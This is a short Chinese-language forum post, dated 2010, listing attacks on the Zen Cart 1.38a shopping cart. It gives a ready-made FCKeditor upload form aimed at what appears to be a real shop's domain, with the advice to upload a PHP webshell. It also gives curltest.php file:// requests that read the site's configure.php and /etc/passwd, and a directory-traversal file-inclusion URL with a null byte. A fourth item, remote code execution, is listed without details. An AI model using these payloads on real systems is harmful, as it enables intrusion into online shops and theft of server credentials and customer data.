zen cart 1.38a多处漏洞分析
zen cart 1.38a多处漏洞分析发布日期:2010-10.27
发布作者:佚名
影响版本:zen cart 1.38a
漏洞类型:文件上传、文件包含、代码执行
漏洞描述:
漏洞1、
<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
大家试下威力。
直接上传PHP WEBSHELL 到IMAGES
漏洞2
Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd
漏洞3
Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞
EXP:[url]http://127.0.0.1/index.php?typefilter=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00[/url]
直接给出EXP 很早的 依然很强大。。。。。。
漏洞4、远程代码执行
页:
[1]